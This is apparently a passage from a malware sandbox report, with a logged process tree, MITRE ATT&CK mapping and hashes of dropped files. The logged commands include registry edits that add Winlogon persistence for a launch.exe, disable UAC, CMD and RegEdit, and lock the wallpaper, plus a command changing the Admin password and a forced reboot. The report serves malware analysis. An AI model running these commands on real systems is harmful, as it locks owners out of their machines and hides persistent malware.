reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
5⤵
- Modifies WinLogon for persistence
PID:1352

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
5⤵
- Sets desktop wallpaper using registry
PID:1840

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
5⤵
PID:392

C:\Windows\system32\reg.exe
reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- UAC bypass
PID:708

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
5⤵
PID:1892

C:\Windows\system32\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
5⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:3228

C:\Windows\system32\net.exe
net user Admin death
5⤵
PID:3568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin death
6⤵
PID:3216

C:\Windows\system32\shutdown.exe
shutdown /t 0 /r
5⤵
PID:592

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4356

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa390d055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\date.txt
Filesize
120B

MD5
255a8e245b6ad378558b90cbe3dbc3d0

SHA1
6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

SHA256
d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

SHA512
67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

Download Submit
C:\Program Files (x86)\hello.bat
Filesize
1KB

MD5
b86fddd2b764f079615be5d4dc3e158d

SHA1
2510479054db1fe52cc2dcd3c7033d91204cb367

SHA256
2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

SHA512
915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

Download Submit
C:\Program Files (x86)\hello.jpg
Filesize
110KB

MD5
057ea45c364eb2994808a47b118556a2

SHA1
1d48c9c15ea5548af1475b5a369a4f7b8db42858

SHA256
6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

SHA512
582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

Download Submit
C:\Program Files (x86)\hello.reg
Filesize
3KB

MD5
81427e9d5d10657b9edffd22e7b405bb

SHA1
f27ab62f77f827dbb32c66a35ac48006c47f4374

SHA256
bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

SHA512
b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

Download Submit
C:\Program Files (x86)\launch.exe
Filesize
92KB

MD5
b4acc41d0e55b299ffeec11a8a20cf08

SHA1
bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

SHA256
34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

SHA512
d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

Download Submit
C:\Program Files (x86)\msg.exe
Filesize
9KB

MD5
331a0667b11e02330357565427dc1175

SHA1
d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

SHA256
fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

SHA512
1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2370dbff-6208-406e-8679-44775297e398.tmp
Filesize
15KB

MD5
a0e425f8d1693a9eab4270acea47dad1

SHA1
2f09e9402f10dd0e8e3a3cc555992e0ba37beb59

SHA256
a122bea4fe4276e1842713c53a90aa5447cc7d49621ed08974913e9a2ff622f1

SHA512
05fa77d279822088c084fd3ccf486bc944d334b692120e1e4f2c1aba9057871a83cef2973d1c0f9def4e8cf799ccb085fe1fe944091ec98c637c34e3f0b47833

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
Filesize
649B

MD5
1111e959c723409a2171b955971fdb73

SHA1
9e60796ea2b406e895111a4589129ac823c1479c

SHA256
b59be17b890b0b7fa0d1e2ec1eac415afd693aaa0786490686ea33f54f6f241d

SHA512
26175556d604c039b6721eb9db0fe3731cc8f2732f0d6203bca2be7f4e3c586cb3cd98625b31e1bb44251f1b143d1ca8811efbdffd223c60d8c434490e05b71e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
f3b521bf60e4f6558d0d598dc7b3db40

SHA1
eaab2ff3fe2eeb489d503af26c30774b1529c23a

SHA256
b815d26a298f75f02ce30a31e417c564ebd92ecf6b88cce0999a8ee5f0b6f2f7

SHA512
12be2a5212924a52af4d820ece0db405aa0ffbe9e80f098428dea198af75d5db5dc95380b86b09cc4eb1d7eff11e4b4c60f24e1001946d8e1340e8f16f2981c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
356B

MD5
6d3353e92e8e2f749a99ac64faf9c87b

SHA1
5d4d1eff3ab9a4e69a2d59163cf83f15d10ffbcf

SHA256
546d0846214691326fb5e9fb70c87b5730010a3ebc121c1031dcc07d84a55ab6

SHA512
4af553b5e0ff7d85cfd41a1f7b29f3a40b5431570abc2002c52018b0555e8df6f94e0e5c22512797424b3e891f3f6a714543beef367f126910c6c863b01947eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
1KB

MD5
c4327953fc8ba0e95c0284ab068e95e9

SHA1
6abba9105d09751dbae1790631195fcb24169b73

SHA256
504bc7d8699db810a07a9e90f058a963176fc3457eff8d0995cf9609db3643eb

SHA512
895212f66610b02325a49ca64dd28a1325fdec546a68d1d2946bae26e8421c14a64b251869f8665599514000eda9bec3fda42990d5a105783a616c182aa01acd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
9KB

MD5
783fdcf359c06f3684d3124cdab1b185

SHA1
cf74755e5385352a41b9187935f49844678a98ae

SHA256
6dfcbc89d6c90afa634aaf6d41f94167b94c63da7769182cf66461a5291ce77b

SHA512
0956789e914941d3217ac3fd25cece90a9ecddeb8effb051cd7b7dee0625cc70653b0b3ff799c8c4709707dfa97b454e055a112948314aa9462467907b247f25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB

MD5
f35c1f1b4e16fb025d8883ce5f2235d6

SHA1
e717cdf7ccbc46ba007d4ba3d8bc3a8d3cfaa485

SHA256
ddbbbd53c7590533c8e82b07829d4335b811617b7826a7a27dd9a574a653b527

SHA512
c1b60974b8d84cb3080411caa22814123516eeb3ff0586dcdb29af6abdc0146f1db80d8c17e9958e49e42bfcff5063f01f14453ee2e5e5bb1a46b58d31a8c92e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
9KB

MD5
2a3bc8d861df38f42e043bb963b6a2ca

SHA1
42f626e093f2ba00c7000d5dd6dc257275612997

SHA256
946a9dd968e7c0409a0590b5532be06a162b6eeb7795a619829b302d9ac9c191

SHA512
628f18460c1744d54b75f55aacb187f202b3a804125921eef557fc322887ff3f9989671acb34e6b7a0b6c0dec211494ace1667c97c6aac8a9697d685d15f1723

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB

MD5
9e6cef042dc0e4f259ec39b733b39f24

SHA1
161b15c28e80912fd98def91d323c712396b1176

SHA256
37ba0abcf992a7589e942eb2c754d26ccbd9b0824a875e853033b4233abbad4a

SHA512
458b89466af233194ee3f5d401ee11f24d5a330abf067e478ccc035580cba720ac992e3afe4855c4ec8f43c735cf0ed2b8b50e085f58aaec6fba104675d7d945

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
152KB

MD5
7439a6af3adb1d84eaf3fc53af6d1e5c

SHA1
186b38b931c18caa26c3819944727779a2aeff80

SHA256
1727fa7524c970605f833b725ebbac148813591e6d2620095409b597751644db

SHA512
39145844cb37bd432d5aa2e3011ea9cae04831e7c89916f13a71b374734f8e08fbd07cb3d6cd6f2918471e78386094b37892fa6b0f2a3d683ac0b435bb35159b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
152KB

MD5
0f68406187d96a2c7b167b0461e267a6

SHA1
e2e8430423c5f8ca2a89bb3fe59a0fa60e2c662f

SHA256
1902ca3201123f677ede5aa872f6eafdd9ab02ca0334e896751f6972bb18b20e

SHA512
9ef0d8d14dc7146aaf8745d2adf6c25a6814c185e86ddbca278daf678f3c10c01d39cddf7b447ff41725b22f7844688f5dc374a6f6ce97c425cf1bc26c806b52

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
152KB

MD5
10a64c7506563cff4f98644ce4e28a24

SHA1
d6383ede3afcd8becdbf5af68e1ffe9d92abd243

SHA256
47bfebdac826292d74c3060ac74f117a066036f00c982383fa877038bde69f2b

SHA512
f3f4bcf612bd23f03588f2a3600aa30ee901ccb9568301f8429cf38f4988174c3524e38cf215654848ebf528585a768ba911e8c01d59e5ccf873b99a7fb0fde5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
Filesize
64KB

MD5
987a07b978cfe12e4ce45e513ef86619

SHA1
22eec9a9b2e83ad33bedc59e3205f86590b7d40c

SHA256
f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8

SHA512
39b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Temp\48AC.tmp\48AD.tmp\48AE.vbs
Filesize
588B

MD5
67706bca9ceaba11530e05d351487003

SHA1
3a5ed77f81b14093a5f18c4d46895bc7ea770fee

SHA256
190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

SHA512
902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
Filesize
1KB

MD5
f38858628dc49c8ec313cbe5a5deee6a

SHA1
cab043df354b5e6e54e20020356b452b169c1232

SHA256
abacf4a4e2a48a173cd4c47ef75d51a9f10a52ecf0c5cb28cb32ebb078858ada

SHA512
770fcf588b5182cda93b27e960c8cd8ff95f280535d15673667ad22e4cb01c6c88a4409a4dc06db16dd9a3f7e99e8c44bcb7d8c581283192e2b66e28b90766c2

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 168048.crdownload
Filesize
771KB

MD5
2782877418b44509fd306fd9afe43e39

SHA1
b0c18bdf782ca9c4fa41074f05458ce8e0f3961b

SHA256
56d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b

SHA512
8826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86

Download Submit
\??\pipe\crashpad_4152_OEETGMZWWHWLNNYT
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads